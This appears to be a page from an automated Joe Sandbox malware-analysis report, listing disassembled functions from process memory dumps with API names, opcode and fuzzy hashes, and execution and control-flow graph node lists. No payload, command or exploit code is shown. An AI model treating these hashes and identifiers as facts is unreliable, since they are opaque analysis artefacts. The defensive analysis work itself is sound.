                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: strncmp
                                                                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                                                                        • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                        • Opcode ID: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                        • Instruction ID: c6b38f33ed5d060f27d32c96359b481387a4ac73bdfea2c3748a990edae8328c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43018B66B1458086EB80CBA6F58175E73A0F788FC8F884016DF2D87B49EB69C9908B04
                                                                                                                                                                                                                        Function 0DFD8D90 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 993137029-0
                                                                                                                                                                                                                        • Opcode ID: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                        • Instruction ID: 25f8a80e1c03d50cd197882ecc695e101739221e19137d35c36eaadd8e5d697a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D801FB36A15A8186DB44CF66E8947297371FF88BC0F18C175DA5B07754CF38D056C704
                                                                                                                                                                                                                        Function 0DEF8D90 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 993137029-0
                                                                                                                                                                                                                        • Opcode ID: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                        • Instruction ID: 2cb9615bec48fca5bc4613f6cecfea31a070e14c7e2105410468752031755adb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D701463AA11B81C6EB04CFA6E8943297361FF88B84F089226DB1B13724CF39C056CB00
                                                                                                                                                                                                                        Function 0DFEA840 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3605230531-0
                                                                                                                                                                                                                        • Opcode ID: 3298c160b03af720280bf25109f05f7072eaf5cc03334b36ea2ca8d217dd1ff4
                                                                                                                                                                                                                        • Instruction ID: 29cff5e8ea2b660378410faea1b45d6caf80cedb9d491d0f179702b489565f78
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3298c160b03af720280bf25109f05f7072eaf5cc03334b36ea2ca8d217dd1ff4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A401A232220985D2FB088F15F8A03993370F788B88F455862C65E6F224DFB8C2CAC704
                                                                                                                                                                                                                        Function 0DF0A840 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3605230531-0
                                                                                                                                                                                                                        • Opcode ID: 3298c160b03af720280bf25109f05f7072eaf5cc03334b36ea2ca8d217dd1ff4
                                                                                                                                                                                                                        • Instruction ID: 818176b16d989b0ced43dddd52a0a05537434212f9824d994c3511992087bd3d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3298c160b03af720280bf25109f05f7072eaf5cc03334b36ea2ca8d217dd1ff4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E501DE32620A46D2EB548F99E8943B53371F758B88F469133D61B87664DF38C2DAC324
                                                                                                                                                                                                                        Function 0B0BA840 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3605230531-0
                                                                                                                                                                                                                        • Opcode ID: ecdcad08ee0d4747a6d0166d3f21bcd330d53c8d16308b0998a038b6f95fd6c0
                                                                                                                                                                                                                        • Instruction ID: f6a2cf1ac1f76c47fa0b9c78af58e9394e2b42a91b3412927cdc1a9f04fe6564
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecdcad08ee0d4747a6d0166d3f21bcd330d53c8d16308b0998a038b6f95fd6c0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7014F32720A45D2EB088F55F99539B3371F798B88F455822C63E47664EF78C1DAC304

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:9.1%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:111
                                                                                                                                                                                                                        Total number of Limit Nodes:7
                                                                                                                                                                                                                        execution_graph 30237 10ed01c 30238 10ed034 30237->30238 30239 10ed08e 30238->30239 30242 5382c08 30238->30242 30251 5380ad4 30238->30251 30244 5382c18 30242->30244 30243 5382c79 30276 5380bfc 30243->30276 30244->30243 30246 5382c69 30244->30246 30260 5382e6c 30246->30260 30266 5382d90 30246->30266 30271 5382da0 30246->30271 30247 5382c77 30252 5380adf 30251->30252 30253 5382c79 30252->30253 30255 5382c69 30252->30255 30254 5380bfc CallWindowProcW 30253->30254 30256 5382c77 30254->30256 30257 5382e6c CallWindowProcW 30255->30257 30258 5382da0 CallWindowProcW 30255->30258 30259 5382d90 CallWindowProcW 30255->30259 30257->30256 30258->30256 30259->30256 30261 5382e2a 30260->30261 30262 5382e7a 30260->30262 30280 5382e58 30261->30280 30283 5382e48 30261->30283 30263 5382e40 30263->30247 30268 5382da0 30266->30268 30267 5382e40 30267->30247 30269 5382e58 CallWindowProcW 30268->30269 30270 5382e48 CallWindowProcW 30268->30270 30269->30267 30270->30267 30272 5382db4 30271->30272 30274 5382e58 CallWindowProcW 30272->30274 30275 5382e48 CallWindowProcW 30272->30275 30273 5382e40 30273->30247 30274->30273 30275->30273 30277 5380c07 30276->30277 30278 538435a CallWindowProcW 30277->30278 30279 5384309 30277->30279 30278->30279 30279->30247 30281 5382e69 30280->30281 30287 5384292 30280->30287 30281->30263 30284 5382e58 30283->30284 30285 5382e69 30284->30285 30286 5384292 CallWindowProcW 30284->30286 30285->30263 30286->30285 30288 5380bfc CallWindowProcW 30287->30288 30289 53842aa 30288->30289 30289->30281 30215 13bad38 30218 13bae30 30215->30218 30216 13bad47 30219 13bae64 30218->30219 30221 13bae41 30218->30221 30219->30216 30220 13bb068 GetModuleHandleW 30222 13bb095 30220->30222 30221->30219 30221->30220 30222->30216 30223 13bd0b8 30224 13bd0fe 30223->30224 30228 13bd289 30224->30228 30231 13bd298 30224->30231 30225 13bd1eb 30230 13bd2c6 30228->30230 30234 13bc9a0 30228->30234 30230->30225 30232 13bc9a0 DuplicateHandle 30231->30232 30233 13bd2c6 30232->30233 30233->30225 30235 13bd300 DuplicateHandle 30234->30235 30236 13bd396 30235->30236 30236->30230 30290 13b4668 30291 13b4684 30290->30291 30292 13b4696 30291->30292 30296 13b47a0 30291->30296 30301 13b3e10 30292->30301 30294 13b46b5 30297 13b47c5 30296->30297 30306 13b48a1 30297->30306 30310 13b48b0 30297->30310 30302 13b3e1b 30301->30302 30305 13b6ff8 30302->30305 30318 5386948 30302->30318 30328 5386938 30302->30328 30305->30294 30308 13b48b0 30306->30308 30307 13b49b4 30307->30307 30308->30307 30314 13b4248 30308->30314 30311 13b48d7 30310->30311 30312 13b4248 CreateActCtxA 30311->30312 30313 13b49b4 30311->30313 30312->30313 30315 13b5940 CreateActCtxA 30314->30315 30317 13b5a03 30315->30317 30320 538696b 30318->30320 30319 5386c7a 30322 5387219 KiUserExceptionDispatcher 30319->30322 30323 5387260 KiUserExceptionDispatcher 30319->30323 30324 5387251 KiUserExceptionDispatcher 30319->30324 30320->30319 30338 5387219 30320->30338 30343 5387260 30320->30343 30347 5387251 30320->30347 30321 5386d9e 30322->30321 30323->30321 30324->30321 30330 5386948 30328->30330 30329 5386c7a 30332 5387219 KiUserExceptionDispatcher 30329->30332 30333 5387260 KiUserExceptionDispatcher 30329->30333 30334 5387251 KiUserExceptionDispatcher 30329->30334 30330->30329 30335 5387219 KiUserExceptionDispatcher 30330->30335 30336 5387260 KiUserExceptionDispatcher 30330->30336 30337 5387251 KiUserExceptionDispatcher 30330->30337 30331 5386d9e 30332->30331 30333->30331 30334->30331 30335->30330 30336->30330 30337->30330 30339 538726d 30338->30339 30341 5387222 30338->30341 30340 53872b7 30339->30340 30342 53872cd KiUserExceptionDispatcher 30339->30342 30340->30320 30341->30320 30342->30340 30344 538726d 30343->30344 30345 53872cd KiUserExceptionDispatcher 30344->30345 30346 53872b7 30344->30346 30345->30346 30346->30320 30348 5387260 30347->30348 30349 53872b7 30348->30349 30350 53872cd KiUserExceptionDispatcher 30348->30350 30349->30320 30350->30349

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 07F409C8 Relevance: .6, Instructions: 626COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 826 7f409c8-7f409ea 827 7f409f0-7f40a2b 826->827 828 7f40d9a-7f40d9f 826->828 837 7f40a2d-7f40a37 827->837 838 7f40a3e-7f40a5e 827->838 829 7f40da1-7f40da3 828->829 830 7f40da9-7f40dac 828->830 829->830 1001 7f40dae call 7f409c8 830->1001 1002 7f40dae call 7f40978 830->1002 832 7f40db4-7f40dbc 834 7f40dc2-7f40dc9 832->834 837->838 840 7f40a60-7f40a6a 838->840 841 7f40a71-7f40a91 838->841 840->841 843 7f40aa4-7f40ac4 841->843 844 7f40a93-7f40a9d 841->844 846 7f40ac6-7f40ad0 843->846 847 7f40ad7-7f40ae0 call 7f40790 843->847 844->843 846->847 850 7f40b04-7f40b0d call 7f407a0 847->850 851 7f40ae2-7f40afd call 7f40790 847->851 856 7f40b31-7f40b3a call 7f407b0 850->856 857 7f40b0f-7f40b2a call 7f407a0 850->857 851->850 863 7f40b45-7f40b61 856->863 864 7f40b3c-7f40b40 call 7f407c0 856->864 857->856 868 7f40b63-7f40b69 863->868 869 7f40b79-7f40b7d 863->869 864->863 870 7f40b6d-7f40b6f 868->870 871 7f40b6b 868->871 872 7f40b97-7f40bdf 869->872 873 7f40b7f-7f40b90 call 7f407d0 869->873 870->869 871->869 879 7f40be1 872->879 880 7f40c03-7f40c0a 872->880 873->872 881 7f40be4-7f40bea 879->881 882 7f40c21-7f40c2f call 7f407e0 880->882 883 7f40c0c-7f40c1b 880->883 884 7f40bf0-7f40bf6 881->884 885 7f40dca-7f40e09 881->885 891 7f40c31-7f40c33 882->891 892 7f40c39-7f40c63 call 7f407f0 882->892 883->882 887 7f40c00-7f40c01 884->887 888 7f40bf8-7f40bfa 884->888 894 7f40e68-7f40e78 885->894 895 7f40e0b-7f40e2c 885->895 887->880 887->881 888->887 891->892 906 7f40c65-7f40c73 892->906 907 7f40c90-7f40cac 892->907 901 7f4104e-7f41055 894->901 902 7f40e7e-7f40e88 894->902 895->894 903 7f40e2e-7f40e34 895->903 910 7f41064-7f41077 901->910 911 7f41057-7f4105f call 7f40934 901->911 908 7f40e92-7f40e9c 902->908 909 7f40e8a-7f40e91 902->909 904 7f40e36-7f40e38 903->904 905 7f40e42-7f40e47 903->905 904->905 913 7f40e54-7f40e61 905->913 914 7f40e49-7f40e4d 905->914 906->907 923 7f40c75-7f40c89 906->923 920 7f40cae-7f40cb8 907->920 921 7f40cbf-7f40ce6 call 7f40800 907->921 915 7f41081-7f41122 908->915 916 7f40ea2-7f40ee2 908->916 911->910 913->894 914->913 971 7f41124 915->971 972 7f41129-7f4115f 915->972 941 7f40ee4-7f40eea 916->941 942 7f40efa-7f40efe 916->942 920->921 933 7f40cfe-7f40d02 921->933 934 7f40ce8-7f40cee 921->934 923->907 938 7f40d04-7f40d16 933->938 939 7f40d1d-7f40d39 933->939 936 7f40cf0 934->936 937 7f40cf2-7f40cf4 934->937 936->933 937->933 938->939 951 7f40d51-7f40d55 939->951 952 7f40d3b-7f40d41 939->952 944 7f40eec 941->944 945 7f40eee-7f40ef0 941->945 946 7f40f00-7f40f25 942->946 947 7f40f2b-7f40f43 call 7f40914 942->947 944->942 945->942 946->947 963 7f40f45-7f40f4a 947->963 964 7f40f50-7f40f58 947->964 951->834 957 7f40d57-7f40d65 951->957 955 7f40d45-7f40d47 952->955 956 7f40d43 952->956 955->951 956->951 965 7f40d77-7f40d7b 957->965 966 7f40d67-7f40d75 957->966 963->964 968 7f40f6e-7f40f8d 964->968 969 7f40f5a-7f40f68 call 7f40924 964->969 970 7f40d81-7f40d99 965->970 966->965 966->970 977 7f40fa5-7f40fa9 968->977 978 7f40f8f-7f40f95 968->978 969->968 971->972 986 7f41161 972->986 987 7f41169 972->987 983 7f41002-7f4104b 977->983 984 7f40fab-7f40fb8 977->984 981 7f40f97 978->981 982 7f40f99-7f40f9b 978->982 981->977 982->977 983->901 991 7f40fee-7f40ffb 984->991 992 7f40fba-7f40fec 984->992 986->987 993 7f4116a 987->993 991->983 992->991 993->993 1001->832 1002->832
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1841920373.0000000007F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7f40000_25A2.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 8caedb99ddbc6307550f79991695b137837fe5fdec8921f31a1687100a92d128
                                                                                                                                                                                                                        • Instruction ID: ba4bfa236be5fe4faef8621baceb3639073dbdd873f8e8f25f8530279f1e2639
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8caedb99ddbc6307550f79991695b137837fe5fdec8921f31a1687100a92d128
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4432ADB0B016059FDB14DB69C590BAEBBF6AF88704F1844A9E645DB3A1DF34EC01CB51
                                                                                                                                                                                                                        Function 013BAE30 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 013BB086
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1823422749.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_13b0000_25A2.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                        • Opcode ID: 116a496e14ca1c9eb3e99fcd42d458b7920579780664703ef3b66b424f695653
                                                                                                                                                                                                                        • Instruction ID: 44e3847c68792213483c5d803635057cadcb6cf28248fbf68f3e8c0d1ededc75
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 116a496e14ca1c9eb3e99fcd42d458b7920579780664703ef3b66b424f695653
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84713AB0A00B058FD724DF29D48479ABBF5FF88704F00892DD58AD7A50EB75E949CB91
                                                                                                                                                                                                                        Function 05380BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 60 5380bfc-53842fc 63 53843ac-53843cc call 5380ad4 60->63 64 5384302-5384307 60->64 71 53843cf-53843dc 63->71 66 5384309-5384340 64->66 67 538435a-5384392 CallWindowProcW 64->67 74 5384349-5384358 66->74 75 5384342-5384348 66->75 69 538439b-53843aa 67->69 70 5384394-538439a 67->70 69->71 70->69 74->71 75->74
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05384381
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1829162509.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_5380000_25A2.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CallProcWindow
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2714655100-0
                                                                                                                                                                                                                        • Opcode ID: 961ac0af4b353e19bb8cbe85812ca27079811c7f89156b043c357d94188f6fde
                                                                                                                                                                                                                        • Instruction ID: dcc54485f58eb79a55db5828d858c68956352313171753509b1854375f978de4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 961ac0af4b353e19bb8cbe85812ca27079811c7f89156b043c357d94188f6fde
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22412AB4900309CFDB18DF99C448AAABBF5FF88314F24C459D519AB761D774A841CFA0
                                                                                                                                                                                                                        Function 013B4248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 77 13b4248-13b5a01 CreateActCtxA 80 13b5a0a-13b5a64 77->80 81 13b5a03-13b5a09 77->81 88 13b5a73-13b5a77 80->88 89 13b5a66-13b5a69 80->89 81->80 90 13b5a79-13b5a85 88->90 91 13b5a88 88->91 89->88 90->91 93 13b5a89 91->93 93->93
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 013B59F1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1823422749.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_13b0000_25A2.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Create
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                                                                        • Opcode ID: 9f5fb335c747ee3bdd74297e3476647496bc5215761630db2791e4cb0bb64a51
                                                                                                                                                                                                                        • Instruction ID: 391a80e6a4c4bc36380be7b4f896f96c0600e49e61bc5c7aea7c0450c79653be
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f5fb335c747ee3bdd74297e3476647496bc5215761630db2791e4cb0bb64a51
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3041EFB0D00319CFEB24DFA9C884B8DBBB5BB84714F20805AD508AB251DB716945CF90
                                                                                                                                                                                                                        Function 013B5935 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 94 13b5935-13b593c 95 13b5944-13b5a01 CreateActCtxA 94->95 97 13b5a0a-13b5a64 95->97 98 13b5a03-13b5a09 95->98 105 13b5a73-13b5a77 97->105 106 13b5a66-13b5a69 97->106 98->97 107 13b5a79-13b5a85 105->107 108 13b5a88 105->108 106->105 107->108 110 13b5a89 108->110 110->110
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 013B59F1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1823422749.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_13b0000_25A2.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Create
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                                                                        • Opcode ID: b8c31b13534c4c1ae2a4af8d77a2bbc3139409b64d2017673abaa12a40fd2cf9
                                                                                                                                                                                                                        • Instruction ID: 0af2e7de1b7e963c9324c631e10e787d76126173169ff610d342339c2a9852fb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8c31b13534c4c1ae2a4af8d77a2bbc3139409b64d2017673abaa12a40fd2cf9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1241EDB1D00719CFEB24DFA9C884BCEBBB5BF88704F20806AD508AB255DB756945CF90
                                                                                                                                                                                                                        Function 013BC9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 111 13bc9a0-13bd394 DuplicateHandle 113 13bd39d-13bd3ba 111->113 114 13bd396-13bd39c 111->114 114->113
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013BD2C6,?,?,?,?,?), ref: 013BD387
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1823422749.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_13b0000_25A2.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                        • Opcode ID: 594fe65cd01d0003f625e2a25000de9fed4d3aa63e141217186e55f95379c75f
                                                                                                                                                                                                                        • Instruction ID: 4a3187f62e7448ea27f534bc415810d6d3ad0de7412bc102e8fcce48373f3f28
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 594fe65cd01d0003f625e2a25000de9fed4d3aa63e141217186e55f95379c75f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 702103B590130C9FDB10CFAAD884ADEBBF8FB48314F10841AE918A3350D378A950CFA4
                                                                                                                                                                                                                        Function 013BD2F9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 117 13bd2f9-13bd394 DuplicateHandle 118 13bd39d-13bd3ba 117->118 119 13bd396-13bd39c 117->119 119->118
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013BD2C6,?,?,?,?,?), ref: 013BD387
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1823422749.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_13b0000_25A2.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                        • Opcode ID: 8d5b2cf116639b8367563f6521785d7ec57a2cbfcf035833589edb392476a5a2
                                                                                                                                                                                                                        • Instruction ID: 1f1d7f09cf9e78c4891e8fe5c50c2cf6b94e1ab39d3053930a677877b358a334
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d5b2cf116639b8367563f6521785d7ec57a2cbfcf035833589edb392476a5a2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B62112B5D013099FDB10CFAAD480AEEBBF5FB48314F14842AE918A3250C378A940CFA0
                                                                                                                                                                                                                        Function 05387260 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 122 5387260-5387285 124 538728c-53872b5 122->124 125 5387287 122->125 127 53872c4 124->127 128 53872b7-53872c2 124->128 125->124 132 53872c7 call 5387328 127->132 133 53872c7 call 5387317 127->133 129 538730b-5387314 128->129 130 53872cd-53872e5 KiUserExceptionDispatcher 131 53872ee-53872f8 130->131 131->129 132->130 133->130
                                                                                                                                                                                                                        APIs
